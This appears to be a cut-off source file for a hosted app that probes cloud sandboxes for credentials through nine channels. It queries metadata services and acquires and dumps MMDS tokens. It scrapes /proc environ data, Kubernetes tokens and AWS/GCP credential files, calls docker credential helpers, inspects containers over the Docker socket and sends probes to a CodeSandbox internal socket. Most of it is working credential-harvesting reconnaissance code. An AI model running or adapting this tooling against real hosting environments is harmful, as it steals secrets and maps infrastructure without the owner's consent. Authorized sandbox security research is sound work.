imds-test / app.py
vanilla-tiramisu's picture
Update app.py
973aa1b verified
"""
Cloud Sandbox Credential Surface Probe v2
==========================================
Enumerates 9 credential storage/delivery channels in cloud sandbox environments,
applies extraction techniques, and produces an actionable channel-mapped report.
Credential Channels:
1. IMDS / MMDS (network endpoint)
2. ECS Container Endpoint (network endpoint)
3. IRSA / WI Projected Volume (file)
4. K8s Service Account Token (file, pivot)
5. SDK Configuration Files (file)
6. Hardcoded ENV Injection (environment variable)
7. Credential Helper (helper binary)
8. Sidecar / Reverse Proxy (out-of-sandbox)
9. UDS Proxy (socket)
Extraction Techniques (orthogonal to channels):
- Direct access (curl / cat / env / helper invoke)
- Process environ scanning (/proc/*/environ)
- Docker socket interaction (container inspect)
- MMDS full dump with token acquisition
"""
import gradio as gr
import argparse
import json
import os
import platform
import re
import shutil
import socket
import stat as statmod
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------
DEFAULT_TIMEOUT = 2.5
PREVIEW_BYTES = 160
ENV_KEY_LIMIT = 60
LISTING_LIMIT = 30
SOCKET_PATH_LIMIT = 50
PROC_SAMPLE_LIMIT = 40
MMDS_TOKEN_HINT = "x-metadata-token"
FIRECRACKER_SERVER_HINT = "firecracker api"
ECS_RELATIVE_URI_BASE = "http://169.254.170.2"
HEADER_ALLOWLIST = {
"server", "content-type", "content-length", "metadata-flavor",
"www-authenticate", "x-aws-ec2-metadata-token-ttl-seconds",
"x-ms-version", "date",
}
# Metadata endpoint probes (channel 1 raw reachability)
PROBES = [
{"provider": "aws", "name": "aws_root",
"url": "http://169.254.169.254/", "headers": {}},
{"provider": "aws", "name": "aws_meta_root",
"url": "http://169.254.169.254/latest/meta-data/", "headers": {}},
{"provider": "aws", "name": "aws_dynamic_identity",
"url": "http://169.254.169.254/latest/dynamic/instance-identity/document",
"headers": {}},
{"provider": "firecracker", "name": "firecracker_mmds_ssh_keys",
"url": "http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/",
"headers": {}},
{"provider": "gcp", "name": "gcp_meta_no_header",
"url": "http://metadata.google.internal/computeMetadata/v1/",
"headers": {}},
{"provider": "gcp", "name": "gcp_meta_with_header",
"url": "http://metadata.google.internal/computeMetadata/v1/",
"headers": {"Metadata-Flavor": "Google"}},
{"provider": "azure", "name": "azure_meta_no_header",
"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
"headers": {}},
{"provider": "azure", "name": "azure_meta_with_header",
"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
"headers": {"Metadata": "true"}},
{"provider": "aliyun", "name": "aliyun_meta_root",
"url": "http://100.100.100.200/latest/meta-data/", "headers": {}},
{"provider": "digitalocean", "name": "digitalocean_meta_root",
"url": "http://169.254.169.254/metadata/v1/", "headers": {}},
{"provider": "oci", "name": "oci_meta_no_header",
"url": "http://169.254.169.254/opc/v2/", "headers": {}},
{"provider": "oci", "name": "oci_meta_with_header",
"url": "http://169.254.169.254/opc/v2/",
"headers": {"Authorization": "Bearer Oracle"}},
]
# MMDS / IMDSv2 token acquisition attempts
MMDS_TOKEN_PROBES = [
{"name": "imdsv2_put_token", "method": "PUT",
"url": "http://169.254.169.254/latest/api/token",
"headers": {"X-metadata-token-ttl-seconds": "21600"}},
{"name": "mmds_put_token", "method": "PUT",
"url": "http://169.254.169.254/latest/meta-data/mmds/token",
"headers": {"X-metadata-token-ttl-seconds": "300"}},
]
# Env patterns for interesting key detection
INTERESTING_ENV_PATTERNS = [
"AWS_", "AZURE_", "GCP", "GOOGLE_", "KUBERNETES", "KUBE_",
"ECS", "EC2", "CONTAINER", "DOCKER", "POD", "CI",
"GITHUB_", "GITLAB_", "CODESPACES", "DEVCONTAINER",
"FIRECRACKER", "MMDS",
"CSB", "CODESANDBOX", "PITCHER", "SANDBOX",
"RAILWAY", "FLY_", "RENDER_", "REPLIT_", "GITPOD_",
"TOKEN", "SECRET", "KEY", "CRED", "AUTH", "PASS",
]
# Regex for sensitive values in /proc/*/environ
SENSITIVE_ENVIRON_RE = re.compile(
r'(AKIA[0-9A-Z]{16}'
r'|(?:SECRET|TOKEN|KEY|PASS|CRED|AUTH|MMDS|PITCHER|CSB|CODESANDBOX|SANDBOX)'
r'|(?:eyJ[A-Za-z0-9_-]{10,})'
r')',
re.IGNORECASE,
)
ECS_ENV_KEYS = [
"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI",
"AWS_CONTAINER_CREDENTIALS_FULL_URI",
]
SDK_PATHS = [
"~/.aws/credentials", "~/.aws/config",
"~/.config/gcloud/application_default_credentials.json",
"~/.config/gcloud/access_tokens.db",
"~/.azure",
]
FILE_PREVIEW_PATHS = [
"/proc/1/cgroup", "/proc/self/cgroup", "/proc/1/cmdline",
"/etc/hostname", "/etc/resolv.conf",
"/sys/class/dmi/id/product_name", "/sys/class/dmi/id/product_version",
"/sys/class/dmi/id/sys_vendor", "/sys/class/dmi/id/board_vendor",
"/sys/hypervisor/uuid",
]
FILE_STAT_PATHS = [
"/.dockerenv", "/run/.containerenv",
"/var/lib/cloud/instance/cloud-config.txt", "/etc/cloud/cloud.cfg",
"/var/run/secrets/kubernetes.io/serviceaccount/token",
"/var/run/secrets/kubernetes.io/serviceaccount/namespace",
]
DIRECTORY_LIST_PATHS = ["/var/lib/cloud", "/var/run/secrets", "/run", "/tmp"]
PODMAN_ARTIFACT_PATHS = ["/run/containers", "/run/libpod", "/run/crun"]
# ---------------------------------------------------------------------------
# Utility helpers
# ---------------------------------------------------------------------------
def normalize_path(path):
if os.name == "nt" and path.startswith("/"):
return path.replace("/", "\\")
return path
def sanitize_preview(text, limit=PREVIEW_BYTES):
return re.sub(r"\s+", " ", text.replace("\r", " "))[:limit]
def redact_value(value, keep=12):
if len(value) <= keep:
return value
return value[:keep] + f"...({len(value)} chars)"
def filter_headers(headers):
return {k: v for k, v in headers.items() if k.lower() in HEADER_ALLOWLIST}
def get_header_value(headers, key):
for k, v in headers.items():
if k.lower() == key.lower():
return v
return None
# ---------------------------------------------------------------------------
# Low-level I/O
# ---------------------------------------------------------------------------
def stat_path(path):
target = normalize_path(path)
info = {"path": path, "exists": False, "readable": False}
try:
st = os.stat(target)
info["exists"] = True
info["size"] = st.st_size
info["is_dir"] = os.path.isdir(target)
except Exception as exc:
info["error"] = f"{type(exc).__name__}: {exc}"
return info
try:
with open(target, "rb"):
info["readable"] = True
except Exception:
if info.get("is_dir"):
info["readable"] = True
return info
def read_preview(path, limit=PREVIEW_BYTES):
target = normalize_path(path)
result = {"path": path, "exists": False, "readable": False}
try:
with open(target, "rb") as fh:
result["exists"] = True
result["readable"] = True
body = fh.read(limit).decode("utf-8", errors="replace")
result["preview"] = sanitize_preview(body, limit)
except FileNotFoundError:
result["error"] = "FileNotFoundError"
except Exception as exc:
result["exists"] = os.path.exists(target)
result["error"] = f"{type(exc).__name__}: {exc}"
return result
def read_full(path, limit=65536):
"""Read file fully up to *limit* bytes, return raw bytes or None."""
target = normalize_path(path)
try:
with open(target, "rb") as fh:
return fh.read(limit)
except Exception:
return None
def list_directory(path, limit=LISTING_LIMIT):
target = normalize_path(path)
result = {"path": path, "exists": False, "readable": False}
try:
entries = sorted(os.listdir(target))
result.update(exists=True, readable=True,
entries=entries[:limit], entry_count=len(entries))
except FileNotFoundError:
result["error"] = "FileNotFoundError"
except Exception as exc:
result["exists"] = os.path.exists(target)
result["error"] = f"{type(exc).__name__}: {exc}"
return result
def find_socket_files(limit=SOCKET_PATH_LIMIT):
if os.name == "nt":
return []
findings = []
for root in ["/run", "/var/run", "/tmp", "/project", "/workspace"]:
target = normalize_path(root)
if not os.path.isdir(target):
continue
for cr, _, files in os.walk(target):
for fn in files:
fp = os.path.join(cr, fn)
try:
if statmod.S_ISSOCK(os.stat(fp).st_mode):
findings.append(fp)
if len(findings) >= limit:
return findings
except Exception:
continue
return findings
# ---------------------------------------------------------------------------
# HTTP helpers
# ---------------------------------------------------------------------------
def http_get(url, headers=None, timeout=DEFAULT_TIMEOUT, method="GET",
data=None, read_limit=PREVIEW_BYTES):
"""Generic HTTP request, returns dict with status/body/headers/error."""
hdrs = headers or {}
started = time.time()
req = urllib.request.Request(url, headers=hdrs, method=method, data=data)
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
body = resp.read(read_limit).decode("utf-8", errors="replace")
return {
"status": resp.status, "ok": True,
"latency_ms": round((time.time() - started) * 1000, 2),
"headers": filter_headers(resp.headers),
"body": body,
}
except urllib.error.HTTPError as exc:
preview = None
try:
preview = exc.read(read_limit).decode("utf-8", errors="replace")
except Exception:
pass
return {
"status": exc.code, "ok": False,
"latency_ms": round((time.time() - started) * 1000, 2),
"headers": filter_headers(exc.headers),
"error": str(exc.reason), "body": preview,
}
except urllib.error.URLError as exc:
reason = exc.reason
msg = "timeout" if isinstance(reason, socket.timeout) else f"{type(reason).__name__}: {reason}"
return {"status": None, "ok": False,
"latency_ms": round((time.time() - started) * 1000, 2),
"error": msg}
except socket.timeout:
return {"status": None, "ok": False,
"latency_ms": round((time.time() - started) * 1000, 2),
"error": "timeout"}
except Exception as exc:
return {"status": None, "ok": False,
"latency_ms": round((time.time() - started) * 1000, 2),
"error": f"{type(exc).__name__}: {exc}"}
def uds_http_get(socket_path, http_path, timeout=5, recv_limit=65536):
"""HTTP GET over Unix Domain Socket. Returns response body string."""
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect(socket_path)
req = f"GET {http_path} HTTP/1.0\r\nHost: localhost\r\n\r\n"
s.sendall(req.encode())
chunks = []
while True:
chunk = s.recv(recv_limit)
if not chunk:
break
chunks.append(chunk)
s.close()
raw = b"".join(chunks).decode("utf-8", errors="replace")
if "\r\n\r\n" in raw:
_, body = raw.split("\r\n\r\n", 1)
return body
return raw
def uds_send_json(socket_path, payload, timeout=3, recv_limit=4096):
"""Send JSON over Unix Domain Socket, return response string."""
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect(socket_path)
s.sendall((json.dumps(payload) + "\n").encode())
resp = s.recv(recv_limit).decode("utf-8", errors="replace")
s.close()
return resp
# ---------------------------------------------------------------------------
# Runtime fingerprinting
# ---------------------------------------------------------------------------
def get_runtime():
return {
"hostname": socket.gethostname(),
"platform": platform.platform(),
"python_version": platform.python_version(),
"pid": os.getpid(),
"uid": os.getuid() if hasattr(os, "getuid") else None,
"cwd": os.getcwd(),
"argv": sys.argv,
"env_key_count": len(os.environ),
}
def collect_runtime_context():
"""Filesystem / cgroup / marker fingerprints to characterise the sandbox."""
return {
"file_previews": [read_preview(p) for p in FILE_PREVIEW_PATHS],
"file_stats": [stat_path(p) for p in FILE_STAT_PATHS],
"directory_samples": [list_directory(p) for p in DIRECTORY_LIST_PATHS],
"interesting_env_keys": _collect_env_keys(),
}
def _collect_env_keys():
matches = []
for key in sorted(os.environ):
upper = key.upper()
if any(pat in upper for pat in INTERESTING_ENV_PATTERNS):
matches.append(key)
return matches[:ENV_KEY_LIMIT]
# ---------------------------------------------------------------------------
# Channel 1 – IMDS / MMDS
# ---------------------------------------------------------------------------
def _is_firecracker_gated(item):
if item.get("status") != 401:
return False
srv = get_header_value(item.get("headers", {}), "server") or ""
body = (item.get("body") or item.get("preview") or "").lower()
return FIRECRACKER_SERVER_HINT in srv.lower() and MMDS_TOKEN_HINT in body
def probe_metadata_endpoints(timeout):
results = []
for p in PROBES:
r = http_get(p["url"], headers=p["headers"], timeout=timeout,
read_limit=PREVIEW_BYTES)
r["provider"] = p["provider"]
r["name"] = p["name"]
r["url"] = p["url"]
results.append(r)
return results
def try_acquire_mmds_token(timeout):
"""Attempt IMDSv2 PUT and variants to obtain a session token."""
results = []
for tp in MMDS_TOKEN_PROBES:
r = http_get(tp["url"], headers=tp["headers"], method=tp["method"],
data=b"", timeout=timeout, read_limit=256)
entry = {
"name": tp["name"],
"status": r.get("status"),
"ok": r.get("ok", False),
"latency_ms": r.get("latency_ms"),
}
if r.get("ok") and r.get("body"):
token = r["body"].strip()
entry["token_length"] = len(token)
entry["token_preview"] = token
if r.get("error"):
entry["error"] = r["error"]
results.append(entry)
return results
def dump_mmds_full(token, timeout=5):
"""Fetch the entire MMDS tree and decode additional_files byte arrays."""
result = {"token_ok": False, "raw_size": 0}
r = http_get("http://169.254.169.254/",
headers={"X-metadata-token": token,
"Accept": "application/json"},
timeout=timeout, read_limit=262144) # 256 KB
if not r.get("ok"):
result["error"] = r.get("error", f"status={r.get('status')}")
return result
body = r.get("body", "")
result["token_ok"] = True
result["raw_size"] = len(body)
try:
tree = json.loads(body)
except json.JSONDecodeError:
result["tree_raw_preview"] = sanitize_preview(body, 2048)
return result
# Walk the tree and collect all leaf keys (redacted values)
key_inventory = []
_walk_keys(tree, "", key_inventory, depth=0)
result["key_inventory"] = key_inventory
# Decode additional_files byte arrays
decoded_files = {}
try:
additional = tree.get("latest", {}).get("additional_files", {})
if not additional:
# Try other common structures
for top_key in tree:
sub = tree[top_key]
if isinstance(sub, dict) and "additional_files" in sub:
additional = sub["additional_files"]
break
for fpath, fobj in additional.items():
content = fobj if isinstance(fobj, list) else fobj.get("content", []) if isinstance(fobj, dict) else []
if isinstance(content, list):
raw_text = bytes(content).decode("utf-8", errors="replace")
lines = raw_text.split("\n")
redacted = []
for line in lines:
if "=" in line:
k, _, v = line.partition("=")
redacted.append(f"{k}={redact_value(v, 16)}")
elif line.strip():
redacted.append(redact_value(line, 40))
decoded_files[fpath] = {
"line_count": len(lines),
"raw_length": len(raw_text),
"content_redacted": "\n".join(redacted),
}
except Exception as exc:
decoded_files["_error"] = f"{type(exc).__name__}: {exc}"
result["decoded_files"] = decoded_files
return result
def _walk_keys(obj, prefix, acc, depth=0, max_depth=6):
if depth > max_depth:
return
if isinstance(obj, dict):
for k, v in obj.items():
full = f"{prefix}/{k}" if prefix else k
if isinstance(v, (dict, list)):
_walk_keys(v, full, acc, depth + 1, max_depth)
else:
val_str = str(v)
acc.append({"key": full, "type": type(v).__name__,
"value_preview": redact_value(val_str, 20)})
elif isinstance(obj, list) and len(obj) < 200:
acc.append({"key": prefix, "type": "list",
"value_preview": f"[{len(obj)} items]"})
def collect_channel_1(timeout):
"""Channel 1: IMDS / MMDS – probe, acquire token, dump."""
probes = probe_metadata_endpoints(timeout)
token_attempts = try_acquire_mmds_token(timeout)
mmds_dump = None
acquired_token = None
for t in token_attempts:
if t.get("ok") and t.get("token_length", 0) > 0:
# Reconstruct full token – re-fetch
r = http_get(MMDS_TOKEN_PROBES[0]["url"],
headers=MMDS_TOKEN_PROBES[0]["headers"],
method="PUT", data=b"", timeout=timeout,
read_limit=512)
if r.get("ok"):
acquired_token = r["body"].strip()
break
if acquired_token:
mmds_dump = dump_mmds_full(acquired_token, timeout=max(timeout, 5))
# Classify probes
reachable, gated, mmds_gated, blocked = [], [], [], []
for item in probes:
if item.get("status") == 200:
reachable.append(item["name"])
elif _is_firecracker_gated(item):
mmds_gated.append(item["name"])
else:
blocked.append(item["name"])
status = "open"
if reachable:
status = "directly_reachable"
elif acquired_token and mmds_dump and mmds_dump.get("token_ok"):
status = "token_gate_bypassed"
elif mmds_gated:
status = "token_gated"
elif blocked:
status = "blocked"
return {
"status": status,
"probes": probes,
"token_attempts": token_attempts,
"mmds_dump": mmds_dump,
"directly_reachable": reachable,
"mmds_token_gated": mmds_gated,
"blocked": blocked,
}
# ---------------------------------------------------------------------------
# Channel 2 – ECS Container Credential Endpoint
# ---------------------------------------------------------------------------
def collect_channel_2(timeout):
entries = []
for key in ECS_ENV_KEYS:
val = os.environ.get(key)
if not val:
continue
url = f"{ECS_RELATIVE_URI_BASE}{val}" if key.endswith("RELATIVE_URI") else val
r = http_get(url, timeout=timeout, read_limit=512)
entries.append({
"env_key": key, "url_redacted": redact_value(url, 30),
"status": r.get("status"), "ok": r.get("ok", False),
"body_preview": redact_value(r.get("body", ""), 40) if r.get("body") else None,
"error": r.get("error"),
})
return {
"status": "detected" if any(e["ok"] for e in entries) else (
"env_present" if entries else "not_found"),
"entries": entries,
}
# ---------------------------------------------------------------------------
# Channel 3 – IRSA / Workload Identity projected volumes
# ---------------------------------------------------------------------------
def collect_channel_3():
pointers = []
for env_key in ("AWS_WEB_IDENTITY_TOKEN_FILE",
"GOOGLE_APPLICATION_CREDENTIALS",
"AZURE_CLIENT_CERTIFICATE_PATH"):
val = os.environ.get(env_key)
if not val:
continue
info = stat_path(val)
entry = {"env_key": env_key, "path": val, **info}
if info.get("readable"):
preview = read_preview(val, limit=240)
entry["content_preview"] = redact_value(
preview.get("preview", ""), 40)
entry["jwt_like"] = preview.get("preview", "").count(".") >= 2
pointers.append(entry)
return {
"status": "detected" if pointers else "not_found",
"pointers": pointers,
}
# ---------------------------------------------------------------------------
# Channel 4 – Kubernetes Service Account Token
# ---------------------------------------------------------------------------
def collect_channel_4():
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
ns_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"
token_info = stat_path(token_path)
result = {"status": "not_found", "token": token_info}
if token_info.get("exists") and token_info.get("readable"):
preview = read_preview(token_path, limit=300)
raw = preview.get("preview", "")
result["status"] = "detected"
result["jwt_like"] = raw.count(".") >= 2
result["content_preview"] = redact_value(raw, 30)
ns_info = read_preview(ns_path, limit=100)
if ns_info.get("readable"):
result["namespace"] = ns_info.get("preview", "").strip()
return result
# ---------------------------------------------------------------------------
# Channel 5 – SDK configuration files
# ---------------------------------------------------------------------------
def collect_channel_5():
found = []
for raw_path in SDK_PATHS:
expanded = os.path.expanduser(raw_path)
info = stat_path(expanded)
if info.get("exists"):
entry = {"path": expanded, **info}
if info.get("readable") and not info.get("is_dir"):
p = read_preview(expanded, limit=512)
entry["content_preview"] = redact_value(
p.get("preview", ""), 60)
found.append(entry)
# Also try /home/*/.aws etc
for home_base in ["/home", "/root"]:
for sub in [".aws/credentials", ".aws/config",
".config/gcloud/application_default_credentials.json"]:
candidate = os.path.join(home_base, sub)
if candidate == os.path.expanduser(f"~/{sub}"):
continue
info = stat_path(candidate)
if info.get("exists"):
found.append({"path": candidate, **info})
return {
"status": "detected" if found else "not_found",
"files": found,
}
# ---------------------------------------------------------------------------
# Channel 6 – Hardcoded ENV injection
# ---------------------------------------------------------------------------
def collect_channel_6():
"""Scan current process env AND /proc/*/environ for sensitive vars."""
# Current process
current_env = []
for key in sorted(os.environ):
upper = key.upper()
if any(pat in upper for pat in INTERESTING_ENV_PATTERNS):
current_env.append({
"key": key,
"value_preview": redact_value(os.environ[key], 16),
"value_length": len(os.environ[key]),
})
# Cross-process scan
cross_process = _scan_proc_environ()
return {
"status": "detected" if (current_env or cross_process["findings"]) else "not_found",
"current_process_interesting_count": len(current_env),
"current_process": current_env[:ENV_KEY_LIMIT],
"cross_process": cross_process,
}
def _scan_proc_environ():
proc_root = normalize_path("/proc")
if not os.path.isdir(proc_root):
return {"supported": False, "findings": []}
findings = []
seen_keys = set()
pids_sampled = 0
pids_readable = 0
for entry in sorted(os.listdir(proc_root)):
if not entry.isdigit():
continue
if pids_sampled >= PROC_SAMPLE_LIMIT:
break
pids_sampled += 1
environ_path = os.path.join(proc_root, entry, "environ")
try:
with open(environ_path, "rb") as fh:
raw = fh.read(16384)
pids_readable += 1
except Exception:
continue
for pair in raw.split(b'\x00'):
try:
decoded = pair.decode("utf-8", errors="replace")
except Exception:
continue
if '=' not in decoded:
continue
key, _, value = decoded.partition('=')
if key in seen_keys:
continue
if SENSITIVE_ENVIRON_RE.search(key) or SENSITIVE_ENVIRON_RE.search(value):
seen_keys.add(key)
findings.append({
"pid": entry, "key": key,
"value_preview": redact_value(value, 12),
"value_length": len(value),
})
return {
"supported": True,
"pids_sampled": pids_sampled,
"pids_readable": pids_readable,
"finding_count": len(findings),
"findings": findings,
}
# ---------------------------------------------------------------------------
# Channel 7 – Docker Credential Helper
# ---------------------------------------------------------------------------
def collect_channel_7():
# Search multiple possible config locations
candidates = [
os.path.expanduser("~/.docker/config.json"),
"/root/.docker/config.json",
"/home/*/.docker/config.json",
]
config_found = None
for c in candidates:
if "*" in c:
import glob
for match in glob.glob(c):
if os.path.isfile(match):
config_found = match
break
elif os.path.isfile(c):
config_found = c
break
result = {"status": "not_found", "config_path": config_found, "helpers": []}
if not config_found:
return result
try:
with open(config_found, "r", encoding="utf-8") as fh:
data = json.load(fh)
except Exception as exc:
result["error"] = f"{type(exc).__name__}: {exc}"
return result
helper_names = []
if isinstance(data.get("credsStore"), str):
helper_names.append(data["credsStore"])
cred_helpers = data.get("credHelpers", {})
if isinstance(cred_helpers, dict):
helper_names.extend(v for v in cred_helpers.values() if isinstance(v, str))
for name in sorted(set(helper_names)):
bin_name = f"docker-credential-{name}"
found = bool(shutil.which(bin_name))
entry = {"name": name, "binary": bin_name, "binary_found": found}
# Try invoking list
if found:
entry["list_result"] = _try_helper_list(bin_name)
result["helpers"].append(entry)
# Also check for the binary even without config
for bin_name in ["docker-credential-secret", "docker-credential-ecr-login",
"docker-credential-gcloud", "docker-credential-helper"]:
if shutil.which(bin_name) and bin_name not in [h["binary"] for h in result["helpers"]]:
entry = {"name": bin_name.replace("docker-credential-", ""),
"binary": bin_name, "binary_found": True,
"note": "found_in_PATH_without_config"}
entry["list_result"] = _try_helper_list(bin_name)
result["helpers"].append(entry)
result["status"] = "detected" if result["helpers"] else "not_found"
return result
def _try_helper_list(bin_name):
"""Try echo '' | docker-credential-xxx list"""
import subprocess
try:
proc = subprocess.run(
[bin_name, "list"],
input=b"", capture_output=True, timeout=5,
)
out = proc.stdout.decode("utf-8", errors="replace")[:512]
err = proc.stderr.decode("utf-8", errors="replace")[:256]
return {
"returncode": proc.returncode,
"stdout_preview": redact_value(out, 80),
"stderr_preview": redact_value(err, 80) if err else None,
}
except FileNotFoundError:
return {"error": "binary_not_found"}
except Exception as exc:
return {"error": f"{type(exc).__name__}: {exc}"}
# ---------------------------------------------------------------------------
# Channel 8 – Sidecar / Reverse Proxy (detection by absence)
# ---------------------------------------------------------------------------
def collect_channel_8():
"""Infer sidecar presence by checking for proxy env vars and iptables."""
indicators = []
for key in ("HTTP_PROXY", "HTTPS_PROXY", "http_proxy", "https_proxy",
"NO_PROXY", "no_proxy"):
val = os.environ.get(key)
if val:
indicators.append({"type": "proxy_env", "key": key,
"value_preview": redact_value(val, 30)})
# Check if iptables has NAT rules redirecting outbound traffic
import subprocess
try:
proc = subprocess.run(
["iptables", "-t", "nat", "-L", "-n"],
capture_output=True, timeout=5,
)
out = proc.stdout.decode("utf-8", errors="replace")
if "REDIRECT" in out or "DNAT" in out:
indicators.append({"type": "iptables_redirect",
"preview": redact_value(out, 120)})
except Exception:
pass
return {
"status": "possible" if indicators else "not_observed",
"indicators": indicators,
}
# ---------------------------------------------------------------------------
# Channel 9 – UDS Proxy
# ---------------------------------------------------------------------------
def collect_channel_9(timeout):
"""Enumerate Unix domain sockets and probe high-value ones."""
socket_files = find_socket_files()
# Classify
docker_socks = [s for s in socket_files if "docker.sock" in s]
pitcher_socks = [s for s in socket_files if "pitcher" in s]
git_socks = [s for s in socket_files if "git" in s and s.endswith(".sock")]
vscode_socks = [s for s in socket_files if "vscode" in s]
other_socks = [s for s in socket_files
if s not in docker_socks + pitcher_socks + git_socks + vscode_socks]
# Probe docker socket
docker_probe = None
if docker_socks:
docker_probe = _probe_docker_socket(docker_socks[0])
# Probe pitcher socket
pitcher_probe = None
if pitcher_socks:
pitcher_probe = _probe_pitcher_socket(pitcher_socks[0])
return {
"status": "detected" if socket_files else "not_found",
"total_count": len(socket_files),
"docker_sockets": docker_socks,
"pitcher_sockets": pitcher_socks,
"git_sockets": git_socks,
"vscode_sockets": vscode_socks,
"other_sockets": other_socks,
"docker_probe": docker_probe,
"pitcher_probe": pitcher_probe,
}
def _probe_docker_socket(sock_path):
"""Interact with Docker daemon via UDS: list containers, inspect, images."""
result = {"socket_path": sock_path, "accessible": False}
if not os.path.exists(sock_path):
result["error"] = "not_found"
return result
try:
# List containers
raw = uds_http_get(sock_path, "/containers/json?all=true")
containers = json.loads(raw)
result["accessible"] = True
result["container_count"] = len(containers)
result["containers"] = []
for c in containers[:10]:
cid = c.get("Id", "")[:12]
entry = {
"id_short": cid,
"image": c.get("Image", ""),
"state": c.get("State", ""),
"names": c.get("Names", []),
}
# Inspect each container for ENV and Mounts
try:
inspect_raw = uds_http_get(sock_path,
f"/containers/{cid}/json")
inspect = json.loads(inspect_raw)
env_list = inspect.get("Config", {}).get("Env", [])
entry["env"] = []
for e in env_list:
if "=" in e:
k, _, v = e.partition("=")
entry["env"].append(f"{k}={redact_value(v, 16)}")
else:
entry["env"].append(e)
mounts = inspect.get("Mounts", [])
entry["mounts"] = [{
"type": m.get("Type"), "src": m.get("Source"),
"dst": m.get("Destination"), "rw": m.get("RW"),
} for m in mounts]
hc = inspect.get("HostConfig", {})
entry["privileged"] = hc.get("Privileged")
entry["pid_mode"] = hc.get("PidMode")
entry["network_mode"] = hc.get("NetworkMode")
entry["cap_add"] = hc.get("CapAdd")
except Exception as exc:
entry["inspect_error"] = f"{type(exc).__name__}: {exc}"
result["containers"].append(entry)
# List images
img_raw = uds_http_get(sock_path, "/images/json")
images = json.loads(img_raw)
result["image_count"] = len(images)
result["images"] = [{
"id_short": img.get("Id", "")[:20],
"tags": img.get("RepoTags", []),
"size_mb": round(img.get("Size", 0) / 1048576, 1),
} for img in images[:15]]
except Exception as exc:
result["error"] = f"{type(exc).__name__}: {exc}"
return result
def _probe_pitcher_socket(sock_path):
"""Probe CodeSandbox pitcher socket – try HTTP and JSON protocols."""
result = {"socket_path": sock_path, "exists": os.path.exists(sock_path),
"accessible": False, "http_hints": [], "json_hints": []}
if not result["exists"]:
return result
# HTTP attempts
for method_path in [("GET", "/"), ("GET", "/health"), ("GET", "/status")]:
method, path = method_path
try:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.settimeout(2)
s.connect(sock_path)
req = f"{method} {path} HTTP/1.0\r\nHost: localhost\r\n\r\n"
s.sendall(req.encode())
resp = s.recv(2048).decode("utf-8", errors="replace")
s.close()
result["accessible"] = True
result["http_hints"].append({
"request": f"{method} {path}",
"response_preview": sanitize_preview(resp, 300),
})
except Exception as exc:
result["http_hints"].append({
"request": f"{method} {path}",
"error": f"{type(exc).__name__}: {exc}",
})
# JSON-RPC / custom JSON attempts
json_payloads = [
{"jsonrpc": "2.0", "method": "list", "id": 1},
{"jsonrpc": "2.0", "method": "help", "id": 2},
{"jsonrpc": "2.0", "method": "status", "id": 3},
{"jsonrpc": "2.0", "method": "ls", "params": {"path": "/"}, "id": 4},
{"type": "list"},
{"type": "status"},
{"type": "readdir", "params": {"path": "/"}},
{"action": "list_files", "path": "/"},
]
for payload in json_payloads:
try:
resp = uds_send_json(sock_path, payload, timeout=2)
result["accessible"] = True
result["json_hints"].append({
"request": payload,
"response_preview": sanitize_preview(resp, 300),
})
except Exception as exc:
result["json_hints"].append({
"request": payload,
"error": f"{type(exc).__name__}: {exc}",
})
return result
# ---------------------------------------------------------------------------
# Container runtime artifacts (Podman/crun/libpod)
# ---------------------------------------------------------------------------
def collect_container_runtime_artifacts():
results = []
for path in PODMAN_ARTIFACT_PATHS:
info = list_directory(path, limit=30)
if info.get("exists"):
results.append(info)
# Read JSON configs under libpod / crun
for base in PODMAN_ARTIFACT_PATHS:
target = normalize_path(base)
if not os.path.isdir(target):
continue
for root, dirs, files in os.walk(target):
for f in files:
if f.endswith(".json") or "config" in f.lower() or "secret" in f.lower():
fpath = os.path.join(root, f)
results.append(read_preview(fpath, limit=1024))
if len(results) > 30:
break
return results
# ---------------------------------------------------------------------------
# DNS resolution
# ---------------------------------------------------------------------------
def resolve_hosts():
hosts = ["metadata.google.internal", "169.254.169.254", "100.100.100.200"]
results = []
for h in hosts:
started = time.time()
try:
infos = socket.getaddrinfo(h, 80, type=socket.SOCK_STREAM)
addrs = sorted({i[4][0] for i in infos})
results.append({"hostname": h, "ok": True, "addresses": addrs,
"latency_ms": round((time.time() - started) * 1000, 2)})
except Exception as exc:
results.append({"hostname": h, "ok": False,
"error": f"{type(exc).__name__}: {exc}",
"latency_ms": round((time.time() - started) * 1000, 2)})
return results
# ---------------------------------------------------------------------------
# Assessment (channel-mapped)
# ---------------------------------------------------------------------------
def build_assessment(report):
"""Produce a concise, channel-mapped assessment with severity."""
channels = report["channels"]
findings = []
# CH1
ch1 = channels["ch1_imds_mmds"]
if ch1["status"] == "token_gate_bypassed":
findings.append({
"channel": 1, "name": "IMDS/MMDS",
"severity": "high",
"title": "MMDS token gate bypassed – full keyspace readable",
"detail": "IMDSv2 PUT from within sandbox returns a valid session token; "
"MMDS data including additional_files is fully accessible.",
"evidence_keys": ["channels.ch1_imds_mmds.mmds_dump"],
})
elif ch1["status"] == "directly_reachable":
findings.append({
"channel": 1, "name": "IMDS/MMDS",
"severity": "high",
"title": "Metadata endpoint directly reachable without any gate",
"detail": f"Reachable probes: {ch1['directly_reachable']}",
})
elif ch1["status"] == "token_gated":
findings.append({
"channel": 1, "name": "IMDS/MMDS",
"severity": "medium",
"title": "MMDS token-gated – token acquisition failed",
"detail": "Endpoint responds with 401; PUT token attempts did not succeed.",
})
# CH2
ch2 = channels["ch2_ecs_endpoint"]
if ch2["status"] == "detected":
findings.append({
"channel": 2, "name": "ECS Container Endpoint",
"severity": "high",
"title": "ECS credential endpoint reachable",
"detail": "AWS_CONTAINER_CREDENTIALS env var present and endpoint returned credentials.",
})
# CH3
ch3 = channels["ch3_irsa_wi"]
if ch3["status"] == "detected":
findings.append({
"channel": 3, "name": "IRSA/WI Projected Volume",
"severity": "high",
"title": "Workload identity token file accessible",
